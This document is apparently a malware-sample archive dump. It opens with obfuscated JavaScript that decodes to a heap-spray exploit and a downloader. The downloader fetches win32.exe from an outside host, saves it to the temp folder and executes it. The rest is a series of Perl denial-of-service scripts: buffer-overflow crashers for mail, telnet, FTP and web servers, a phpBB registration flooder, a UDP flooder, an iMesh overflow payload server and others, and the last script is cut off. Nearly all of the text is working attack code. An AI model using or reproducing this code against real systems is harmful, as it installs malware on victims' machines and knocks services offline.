document.write(unescape("%66%35%34%25%75%36%39%34%36%25%75%36%35%36%63%25%75%30%30%34%31%25%75%65%38%35%33%25%75%30%30%66%38%25%75%30%30%30%30%25"));
document.write(unescape("%75%39%30%39%30%25%75%38%64%38%64%25%75%31%32%37%66%25%75%30%30%34%30%25%75%30%30%36%61%25%75%30%30%36%61%25%75%30%39%65"));
document.write(unescape("%38%25%75%30%30%30%30%25%75%36%33%30%30%25%75%35%63%33%61%25%75%32%65%37%34%25%75%36%65%36%39%25%75%30%30%37%38%25%75%36"));
document.write(unescape("%61%35%31%25%75%66%66%30%30%25%75%38%64%64%30%25%75%36%62%38%35%25%75%34%30%31%32%25%75%36%61%30%30%25%75%65%38%30%30%25"));
document.write(unescape("%75%30%30%30%39%25%75%30%30%30%30%25%75%33%61%36%33%25%75%37%34%35%63%25%75%36%39%32%65%25%75%37%38%36%65%25%75%65%38%30"));
document.write(unescape("%30%25%75%30%30%62%65%25%75%30%30%30%30%25%75%38%35%38%64%25%75%31%32%37%33%25%75%30%30%34%30%25%75%30%30%36%61%25%75%62"));
document.write(unescape("%31%65%38%25%75%30%30%30%30%25%75%34%63%30%30%25%75%36%31%36%66%25%75%34%63%36%34%25%75%36%32%36%39%25%75%36%31%37%32%25"));
document.write(unescape("%75%37%39%37%32%25%75%30%30%34%31%25%75%36%39%35%37%25%75%34%35%36%65%25%75%36%35%37%38%25%75%30%30%36%33%25%75%37%38%34"));
document.write(unescape("%35%25%75%37%34%36%39%25%75%37%32%35%30%25%75%36%33%36%66%25%75%37%33%36%35%25%75%30%30%37%33%25%75%37%34%36%38%25%75%37"));
document.write(unescape("%30%37%34%25%75%32%66%33%61%25%75%37%34%32%66%25%75%36%31%37%32%25%75%36%36%36%36%25%75%36%31%33%35%25%75%36%63%36%63%25"));
document.write(unescape("%75%36%32%32%65%25%75%37%61%36%39%25%75%36%31%32%66%25%75%37%36%36%34%25%75%33%30%32%66%25%75%32%66%33%31%25%75%36%39%37"));
document.write(unescape("%37%25%75%33%33%36%65%25%75%32%65%33%32%25%75%37%38%36%35%25%75%30%30%36%35%25%75%36%30%30%30%25%75%38%62%36%34%25%75%33"));
document.write(unescape("%30%31%64%25%75%30%30%30%30%25%75%38%62%30%30%25%75%30%63%35%62%25%75%35%62%38%62%25%75%38%62%31%63%25%75%38%62%31%62%25"));
document.write(unescape("%75%30%38%35%62%25%75%64%61%38%39%25%75%39%64%38%39%25%75%31%33%32%64%25%75%30%30%34%30%25%75%37%62%38%62%25%75%30%31%33"));
document.write(unescape("%63%25%75%30%33%64%37%25%75%37%38%35%66%25%75%34%62%38%62%25%75%38%62%31%38%25%75%32%30%37%33%25%75%37%62%38%62%25%75%30"));
document.write(unescape("%31%32%34%25%75%30%31%64%36%25%75%66%63%64%37%25%75%30%31%61%64%25%75%35%31%64%30%25%75%39%36%35%37%25%75%62%64%38%64%25"));
document.write(unescape("%75%31%33%31%65%25%75%30%30%34%30%25%75%30%66%62%39%25%75%30%30%30%30%25%75%66%33%30%30%25%75%39%36%61%36%25%75%35%39%35"));
document.write(unescape("%66%25%75%30%36%37%34%25%75%34%37%34%37%25%75%65%34%65%32%25%75%63%34%65%62%25%75%63%30%33%31%25%75%38%62%36%36%25%75%63"));
document.write(unescape("%31%30%37%25%75%30%32%65%30%25%75%37%33%38%62%25%75%30%31%31%63%25%75%30%31%64%36%25%75%61%64%63%36%25%75%64%30%30%31%25"));
document.write(unescape("%75%38%35%38%39%25%75%31%33%33%31%25%75%30%30%34%30%25%75%63%33%36%31%25%75%66%66%35%30%25%75%32%64%62%35%25%75%34%30%31"));
document.write(unescape("%33%25%75%66%66%30%30%25%75%33%31%39%35%25%75%34%30%31%33%25%75%66%66%30%30%25%75%34%37%65%30%25%75%37%34%36%35%25%75%37"));
document.write(unescape("%32%35%30%25%75%36%33%36%66%25%75%36%34%34%31%25%75%37%32%36%34%25%75%37%33%36%35%25%75%30%30%37%33%25%75%30%30%30%30%25"));
document.write(unescape("%75%30%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%22%29%3b%79%3d%75%6e%65%73%63%61%70%65%28%22%25%75%30%64%30%64%25%75"));
document.write(unescape("%30%64%30%64%22%29%3b%77%68%69%6c%65%28%79%2e%6c%65%6e%67%74%68%3c%30%78%34%30%30%30%30%29%79%2b%3d%79%3b%79%3d%79%2e%73"));
document.write(unescape("%75%62%73%74%72%69%6e%67%28%30%2c%30%78%33%66%66%65%34%2d%78%2e%6c%65%6e%67%74%68%29%3b%6f%3d%6e%65%77%20%41%72%72%61%79"));
document.write(unescape("%28%29%3b%66%6f%72%28%69%3d%30%3b%69%3c%34%35%30%3b%69%2b%2b%29%6f%5b%69%5d%3d%79%2b%78%3b%7a%3d%4d%61%74%68%2e%63%65%69"));
document.write(unescape("%6c%28%30%78%64%30%64%30%64%30%64%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%6f%62%6a%65%63%74%20%63%6c%61"));
document.write(unescape("%73%73%69%64%3d%22%43%4c%53%49%44%3a%45%43%34%34%34%43%42%36%2d%33%45%37%45%2d%34%38%36%35%2d%42%31%43%33%2d%30%44%45%37"));
document.write(unescape("%32%45%46%33%39%42%33%46%22%3e%3c%5c%2f%6f%62%6a%65%63%74%3e%27%29%3b%7a%3d%64%6f%63%75%6d%65%6e%74%2e%73%63%72%69%70%74"));
document.write(unescape("%73%5b%30%5d%2e%63%72%65%61%74%65%43%6f%6e%74%72%6f%6c%52%61%6e%67%65%28%29%2e%6c%65%6e%67%74%68%3b%7d%63%61%74%63%68%28"));
document.write(unescape("%65%29%7b%7d%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c%73%63%72%69%70%74%3e%0d%0a%3c%21%2d%2d%0d%0a%66%75%6e%63%74%69%6f"));
document.write(unescape("%6e%20%66%28%62%2c%20%61%2c%20%63%29%20%7b%20%72%65%74%75%72%6e%20%61%20%2b%20%62%20%2b%20%63%3b%20%7d%0d%0a%66%75%6e%63"));
document.write(unescape("%74%69%6f%6e%20%67%28%62%2c%20%61%29%20%7b%20%72%65%74%75%72%6e%20%61%20%2b%20%62%3b%20%7d%0d%0a%76%61%72%20%73%20%3d%20"));
document.write(unescape("%6e%65%77%20%41%72%72%61%79%0d%0a%28%0d%0a%20%22%22%2c%0d%0a%20%22%77%69%6e%33%32%2e%65%78%65%22%2c%0d%0a%20%22%68%74%74"));
document.write(unescape("%70%3a%2f%2f%67%61%6d%65%34%75%73%65%72%2e%6e%65%74%2f%61%64%76%2f%30%31%2f%22%2c%0d%0a%20%22%6f%62%6a%65%63%74%22%2c%0d"));
document.write(unescape("%0a%20%22%63%6c%61%73%73%69%64%22%2c%0d%0a%20%66%28%22%30%43%30%22%2c%20%67%28%66%28%67%28%22%33%2d%31%31%44%30%2d%39%22"));
document.write(unescape("%2c%20%22%35%36%2d%36%35%41%22%29%2c%20%22%69%64%3a%42%44%39%36%43%35%22%2c%20%22%38%33%41%2d%30%22%29%2c%20%22%63%6c%73"));
document.write(unescape("%22%29%2c%20%67%28%22%39%45%33%36%22%2c%20%22%34%46%43%32%22%29%29%2c%0d%0a%20%67%28%66%28%22%66%74%2e%58%4d%4c%48%22%2c"));
document.write(unescape("%20%22%6f%73%6f%22%2c%20%22%54%54%50%22%29%2c%20%22%4d%69%63%72%22%29%2c%0d%0a%20%66%28%22%45%22%2c%20%22%47%22%2c%20%22"));
document.write(unescape("%54%22%29%2c%0d%0a%20%66%28%67%28%22%2e%53%74%72%22%2c%20%22%6f%64%62%22%29%2c%20%22%41%64%22%2c%20%22%65%61%6d%22%29%2c"));
document.write(unescape("%0d%0a%20%66%28%67%28%22%2e%53%68%65%22%2c%20%22%69%70%74%22%29%2c%20%22%57%53%63%72%22%2c%20%22%6c%6c%22%29%2c%0d%0a%20"));
document.write(unescape("%22%50%52%4f%43%45%53%53%22%2c%0d%0a%20%22%54%4d%50%22%2c%0d%0a%20%22%2f%5b%5e%2f%5d%2a%24%22%2c%0d%0a%20%22%2f%22%2c%0d"));
document.write(unescape("%0a%20%22%5c%5c%22%0d%0a%29%3b%0d%0a%61%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%73"));
document.write(unescape("%5b%33%5d%29%3b%0d%0a%61%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%73%5b%34%5d%2c%20%73%5b%35%5d%29%3b%0d%0a%77%69%74%68"));
document.write(unescape("%28%61%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%73%5b%36%5d%2c%20%73%5b%30%5d%29%29%0d%0a%7b%0d%0a%20%6f%70%65%6e%28%73"));
document.write(unescape("%5b%37%5d%2c%20%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%2e%72%65%70%6c%61%63%65%28%6e%65%77%20%52%65%67%45%78%70%28%73%5b"));
document.write(unescape("%31%32%5d%29%2c%20%73%5b%31%33%5d%20%2b%20%73%5b%31%5d%29%2c%20%66%61%6c%73%65%29%3b%0d%0a%20%73%65%6e%64%28%29%3b%0d%0a"));
document.write(unescape("%20%69%66%28%73%74%61%74%75%73%20%3c%20%34%30%30%29%0d%0a%20%20%77%69%74%68%28%61%2e%43%72%65%61%74%65%4f%62%6a%65%63%74"));
document.write(unescape("%28%73%5b%38%5d%2c%20%73%5b%30%5d%29%29%0d%0a%20%20%7b%0d%0a%20%20%20%54%79%70%65%20%3d%20%31%3b%0d%0a%20%20%20%4f%70%65"));
document.write(unescape("%6e%28%29%3b%0d%0a%20%20%20%57%72%69%74%65%28%72%65%73%70%6f%6e%73%65%42%6f%64%79%29%3b%0d%0a%20%20%20%77%69%74%68%28%61"));
document.write(unescape("%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%73%5b%39%5d%2c%20%73%5b%30%5d%29%29%0d%0a%20%20%20%7b%0d%0a%20%20%20%20%63%20"));
document.write(unescape("%3d%20%45%6e%76%69%72%6f%6e%6d%65%6e%74%28%73%5b%31%30%5d%29%28%73%5b%31%31%5d%29%20%2b%20%73%5b%31%34%5d%20%2b%20%73%5b"));
document.write(unescape("%31%5d%3b%0d%0a%20%20%20%20%53%61%76%65%54%6f%46%69%6c%65%28%63%2c%20%32%29%3b%0d%0a%20%20%20%20%45%78%65%63%28%63%29%3b"));
document.write(unescape("%0d%0a%20%20%20%7d%0d%0a%20%20%7d%0d%0a%7d%0d%0a%6c%6f%63%61%74%69%6f%6e%2e%72%65%70%6c%61%63%65%28%73%5b%32%5d%29%3b%0d"));
document.write(unescape("%0a%2f%2f%20%2d%2d%3e%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c%2f%68%74%6d%6c%3e"));
</SCRIPT>

47
Perl/DoS.Perl.Avirt Normal file
View File

@ -0,0 +1,47 @@
# Example for a possible DOS-attack against Avirt Mail Server ver3.5.
# There need to be 856 characters to overflow Server.
# Example : Trying example.com...
# Connected to example.com.
# Escape character is '^]'.
# +OK aVirt Mail POP3 Server Ready
# user fuckup
# +OK
# pass [856 characters]
# Overflow
# Hint : Avirt Mail Server ver3.3a has the same problem after 856
# characters (but then you can exploit it)
use IO::Socket;
print "Possible DOS-attack against Avirt Mail Server ver3.5\n";
print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
if (not $ARGV[1]) {
print "Usage: $0 [host] [username]\n\n";
exit(0);
}
sub connecthost {
$host = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $ARGV[0],
PeerPort => "25",) or die "Can't open connection to $ARGV[0] because $!\n";
$host->autoflush(1);
}
$bufferoverflow .= "A" x 856;
print "\nOpen connection...\n";
&connecthost;
print "Sending characters...\n";
print $host "user $ARGV[1]\n";
print $host "pass $bufferoverflow\n";
print "close connection...\n";
close $host;
print "\nTesting...\n";
&connecthost("\nThe host $ARGV[0] is vulnerable to this attack.\n");
close $host;
die "The host $ARGV[0] is not vulnerable to this attack.\n";
# by arbon(arbon@gmx.de)

145
Perl/DoS.Perl.BBDoS.a Normal file
View File

@ -0,0 +1,145 @@
## Name: NsT-phpBBDoS (Perl Version)
## Copyright: Neo Security Team
## Author: HaCkZaTaN
## Ported: g30rg3_x
## Date: 20/06/05
## Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x
## A Simple phpBB Registration And Search DoS Flooder.
##
## g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl
## [+]
## [+] NsT-phpBBDoS v0.2 by HaCkZaTaN
## [+] ported to Perl By g30rg3_x
## [+] Neo Security Team
## [+]
## [+] Host |without http://www.| victimshost.com
## [+] Path |example. /phpBB2/ or /| /phpBB2/
## [+] Flood Type |1=Registration 2=Search| 1
## [+] ..........................................................
## [+] ..........................................................
## [+] ..........................................................
## [+] ..............................................
## [+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed
## g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users I have created"
use IO::Socket;
## Initialized X
$x = 0;
## Flood Variables Provided By User
print q(
NsT-phpBBDoS v0.2 by HaCkZaTaN
ported to Perl By g30rg3_x
Neo Security Team
);
print q(Host |without http://www.| );
$host = <STDIN>;
chop ($host);
print q(Path |example. /phpBB2/ or /| );
$pth = <STDIN>;
chop ($pth);
print q(Flood Type |1 = Registration, 2 = Search| );
$type = <STDIN>;
chop ($type);
## If Type Is Equals To 1 or Registration
if($type == 1){
## User Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{
## Building User in base X
$uname = "username=NsT__" . "$x";
## Building User Mail in base X
$umail = "&email=NsT__" . "$x";
## Final String to Send
$postit = "$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";
## Posit Length
$lrg = length $postit;
## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;
## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
print $sock "POST $pth"."profile.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
## Print a "." for every loop
syswrite STDOUT, ".";
## Increment X in One for every Loop
$x++;
}
## If Type Is Equals To 2 or Search
}
elsif ($type == 2){
## User Search Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{
## Final Search String to Send
$postit = "search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
## Posit Length
$lrg = length $postit;
## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;
## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
## Print a "." for every loop
syswrite STDOUT, ".";
## Increment X in One for every Loop
$x++;
}
}else{
## STF??? What Do You Type
die "Option not Allowed O_o???\n";
}
# milw0rm.com [2005-06-22]

57
Perl/DoS.Perl.BBDoS.c Normal file
View File

@ -0,0 +1,57 @@
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################
use Socket;
$ARGC=@ARGV;
if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}
my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];
socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");
printf "udp flood - KaN3\n";
if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}
packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

38
Perl/DoS.Perl.Chopsui Normal file
View File

@ -0,0 +1,38 @@
#
# Argosoft Mail Server 1.0.0.2 DoS
# Chopsui-cide[MmM] 2000
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# This will cause Argosoft Mail Server 1.0.0.2 to page fault if the finger
# daemon is running.
#
use IO::Socket;
$host = "tr" ;
$port = "79";
$count = 0;
$sod = "";
$len = 3000;
while($count < $len) {
$sod .= "X";
$count += 1;
}
$sod .= "\@X";
$count = 0;
while($count < 5) {
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "unable to connect.\n";
print "done.\n";
print $socket "$sod\x0a";
sleep(5);
close($socket);
$count += 1;
}

43
Perl/DoS.Perl.Fusion Normal file
View File

@ -0,0 +1,43 @@
# Example for a possible DOS-attack against Byte Fusion Telnet.
# There need to be 3090 characters to overflow Server.
# Example : Trying example.com...
# Connected to example.com.
# Escape character is '^]'.
# Byte Fusion Telnet, Copyright 1999 Byte Fusion Corporation
# Unregistered Evaluation. See www.bytefusion.com/telnet.html
# (Machine name) Login: [more then 3090 characters]
# Overflow
use IO::Socket;
print "Possible DOS-attack against Byte Fusion Telnet\n";
print "++++++++++++++++++++++++++++++++++++++++++++++\n";
if (not $ARGV[0]) {
print "Usage: $0 [host]\n\n";
exit(0);
}
sub connecthost {
$host = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $ARGV[0],
PeerPort => "23",) or die "Can't open connection to $ARGV[0] because $!\n";
$host->autoflush(1);
}
$bufferoverflow .= "A" x 3090;
print "\nOpen connection...\n";
&connecthost;
print "Sending characters...\n";
print $host "$bufferoverflow\n";
print "close connection...\n";
close $host;
print "\nTesting...\n";
&connecthost("\nThe host $ARGV[0] is vulnerable to this attack.\n");
close $host;
die "The host $ARGV[0] is not vulnerable to this attack.\n";
# by arbon(arbon@gmx.de)

44
Perl/DoS.Perl.Httux Normal file
View File

@ -0,0 +1,44 @@
use IO::Socket;
#USE .
#./tuxDOS.pl www.some.com.mx 80
#TUX HTTPD Denial of Service for RedHat 7.2
#hecho por malcom-x
#cantact : malcomX@antisocial.com
#####################################################################
if(@ARGV == 2){
my $host = $ARGV[0];
my $port = $ARGV[1];
$EOL = "\015\012";
$BLANK = $EOL x 2;
#you can increment num of request in $sm change this value -> 6000 <-, for enlarge host.
$sm = A x 6000;
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => "$port",
Proto => 'tcp');
unless($sock){
die "jeje Not vulnerable try later.";
}
$sock->autoflush(1);
print $sock "GET / HTTP/1.0\nAccept: */*\nHost: ". $sm ."\n" .$BLANK;
while ( <$sock> ){
print;
}
close $sock;
}else{
print "[Usage]...\n./tuxDOS.pl 'HosT' [port] \n";
}

57
Perl/DoS.Perl.Imesh.102 Normal file
View File

@ -0,0 +1,57 @@
#
# iMesh 1.02 vulnerability
# Chopsui-cide[MmM] 2000
# http://midgets.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# A buffer overflow exists in iMesh 1.02 that allows the execution
# of arbitrary code. When the iMesh client connects to a server,
# the server is able to exploit the vulnerability and execute
# arbitrary code on the system the client is running on.
#
use IO::Socket;
$localhost = "localhost";
$port = "5000";
# Dummy payload
$payload = "";
$c = 0;
while($c < 0x1aa) {
$payload .= "\x90";
$c += 1;
};
$payload .= "\xcc"; # raise exception 03h
$es = "";
$c = 0;
while($c < 0x2723) {
$es .= "\x90";
$c += 1;
};
$es .= "\x43\x04\x43\x00";
$c = 0;
while($c < 12) {
$es .= "\x90";
$c += 1;
};
$es .= $payload;
#print "$es";
$lsock = IO::Socket::INET->new(Proto=>"tcp", LocalHost=>$localhost, LocalPort=>$port, Listen=>1) || die "unable to create socket
.\n";
print "waiting for connection on port $port...";
$accsock = $lsock->accept();
print "connected.\n";
print $accsock "$es";
sleep(5);
close($accsock);
close($lsock);

31
Perl/DoS.Perl.Meteor.a Normal file
View File

@ -0,0 +1,31 @@
#
# meteordos.pl - Remote denial of service against Meteor FTP Version 1.5
#
# A vulnerability has been identified in Meteor FTP Version 1.5, which
# allows malicious users to remotely crash the ftpd. By connecting to the
# ftpd and issuing USER followed by large amounts of data, the server
# crashes. For more info, go to :
# http://www.evicted.org/projects/writings/mftpadvisory.txt
#
# Usage : ./meteordos.pl <host/ip>
#
# Vulnerability & code by zerash
# Contact : zerash@evicted.org
use Net::FTP;
$host = $ARGV[0];
if("$ARGV[0]" eq "") {
print("DoS against Meteor FTP Version 1.5 by zerash\@evicted.org\n");
die("Usage : ./meteorftpdos <host\/ip>\n");
} else {
print("Connecting to $host...\n");
my $ftp = Net::FTP->new($host) or die "Couldn't connect to $host\n";
print("Connected!\n");
print("Attempting to exploit the ftpd...");
$ftp->login('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%');
$ftp->quit;
print("Success!\n");
}

29
Perl/DoS.Perl.Nertt Normal file
View File

@ -0,0 +1,29 @@
#
# Jon Hittner
# Raise the memory size for omnilnet until Windows NT crashes
# Test against NT4.0 SP5 , NT3.51 , Winframe 1.7 SP5b , Winframe 1.8
# Probably needs to be run several times to crash the system depending
# on the amount of memory in the system.
# This code was written to demo a problem, and I take no respoablity on how
# it's used
use strict; use Socket;
my($y,$h,$p,$in_addr,$proto,$addr);
$h = "$ARGV[0]"; $p = 5555 if (!$ARGV[1]);
if (!$h) { print "A hostname must be provided. Ex: www.domain.com\n"; }
$in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
print "TESTING: $h:$p\n";
for ($y=1 ; $y<2500000 ; $y++) {
socket(S, AF_INET, SOCK_STREAM, $proto);
connect(S,$addr) or next;
select S;
$| = 1;
select STDOUT;
send S,"OMNIBACK HAS SOME BIG ISSUES",0;
}
print "ATTACK COMPLETED!\n";

34
Perl/DoS.Perl.Proxometron.a Normal file
View File

@ -0,0 +1,34 @@
#####################################################
# Proxomitron - Universial Web Filter - Version 3 #
# Dos Attack. #
#####################################################
use IO::Socket;
$ARGC=@ARGV;
if ($ARGC !=2) {
print "\n-->";
print "\tUsage: perl dos-prox.pl <host> <port>\n";
exit;
}
$vic = $ARGV[0]; # There IP
$Uport = $ARGV[1]; # There Web Port
$SendStr = "GET /" x 1000; # Crash String
print "\n-->";
print "\tCrashing:$vic on:$Uport\n";
unless ($socket2 = IO::Socket::INET->new (Proto => "TCP",
PeerAddr => $vic,
PeerPort => $Uport))
{
print "-->";
print "\tConnection Failed, Stoping.\n";
exit;
}
print $socket2 "GET $SendStr\n";
close $socket2;
print "-->";
print "\tCrashed:$vic\n";
exit;

79
Perl/DoS.Perl.Raden Normal file
View File

@ -0,0 +1,79 @@
Who has more free file descriptors & network ports, you or the ftp server ?
ftpd's which limit connections to 1 per user@host or similar may have some
defense against this, or if they don't support multiple data connections
open at the same time. I suspect "many" is the number of ftpd's which are
vulnderable to this attack so I've made no attempt (except in one case) to
contact vendors because there are just too many damn vendors, not to mention
ftpd's! But basically, if the other end has, on average, maximum fd limit
at 63, allows 50 connections, that's 3000 open fd's. I'm not sure how many
ftpd's are setup with that many open files as a part of the sytem, but not
many, I suspect.
No apologies for using perl(5), I just wanted a quick prototype. It's not
perfect but then I did't want to spend too much time on this.
to ftpd maintainers:
I don't know of any ftp clients which make use of this feature (multiple
data channels supported concurrently) as the original ftp clients were all
line-based and only suported one transfer at a time. Maybe this is
reasonable, but it would be a shame for the default defense to this attack
to mean you can't use FTP to it's full potential (i.e. start a transfer
from the current session but keep using the current `login' session, maybe
to start other transfers, as requried). Triming the number of concurrent
data sessions to a maximum of 1-5 (by default) would probably be enough,
with the capability to set this higher/lower as required.
Darren
$DOS_HOST="localhost";
use IO::Socket;
$pid = $$;
$num = 0;
while (1) {
while (fork) {
$sock = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $DOS_HOST,
PeerPort => "ftp(21)",
);
if (!$sock) {
print "connect failed!\n";
waitpid -1,0;
}
while (<$sock>) {
print;
print $sock "USER anonymous\r\n" if (/^220 .*/);
print $sock "PASS root@\r\n" if (/^331 .*/);
print $sock "PASV\r\n" if (/^230 .*/);
if (/^227 .*/) {
$remote = $_;
$remote =~ s/^.* [^\d,]*(\d[\d,]+)[^\d,]*$/$1/;
@bits = split(/,/, $remote);
if ($#bits eq 5) {
$remport = $bits[4] * 256 + $bits[5];
$#bits = 3;
$remip = join('.', @bits);
$foo[$num++] = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $remip,
PeerPort => "($remport)");
}
print $sock "PASV\r\n";
}
last if (/^530 .*/);
}
waitpid -1,0;
}
sleep(5);
}

57
Perl/DoS.Perl.Shafolder Normal file
View File

@ -0,0 +1,57 @@
#
#Kazaa/Morpheus Denial of Service Attack
#Coded by Paul Godfrey
#PaulG@Crackdealer.com
#
#Problem: Both Kazaa and Morpheus filesharing applications have "backdoors"
#which allow anonymous file access to their shared folder. What does this have
#to do with Denial of Service? Unlike connections made from other users
#of the applications, the number of connections to the backdoor cannot be
#regulated or detected by the client. This obviously will allow us to flood the
#server with requests and therefore use up all of the available bandwidth.
#Also due to the fact that most users have setup their firewall privileges so
#that Kazaa or Morpheus is allowed access to open connections to outside sources
#this attack will bypass most personal firewall clients such as Zone Alarm.
#
#Enjoy.
#
#Usage: ./km.pl -h victimip
use Socket;
use Getopt::Std;
getopts("h:", \%args);
print("\nK/M Denial of Service\n");
if (!defined $args{h}) {
print("Usage: km.pl -h victimip\n\n");
exit; }
$host = $args{h};
$target = inet_aton($host) || die("inet_aton problems; host doesn't exist?");
$trash="A"x100;
&exec_cmd($command);
sub exec_cmd {
for($count=1;$count<=1000;$count++)
{
sendraw("GET /\"$trash\" HTTP/1.0\n\n");
print("|");
}
print("\nData Sent.\n\n");
}
sub sendraw {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,1214,$target)){
my @in;
select(S); $|=1; print $pstr;
while(< S >){ push @in, $_;
print STDOUT "." if(defined $args{X});}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}

49
Perl/DoS.Perl.Small.a Normal file
View File

@ -0,0 +1,49 @@
# **************************************************************
# DoS for Linux kernels from 2.2.7 to 2.2.9 reported in BUGTRAQ
# 06/01/99 by Piotr Wilkin <pwl@wotan.2slo.wav.pl>
# An attacker has to be in same ethernet segment with victim
# I did't test it
# coded by misteri0 from P.A.T.C.H.
# Requires Net-RawIP-0.09 included in this directory
# Edited for use with toast by Gridmark
# **************************************************************
$| = 1;
require 'getopts.pl';
use Net::RawIP;
Getopts('t:');
die " misteri0\@unet from P.A.T.C.H.\n Usage $0 -t <target>" unless
$opt_t;
srand(time);
$i = 996;
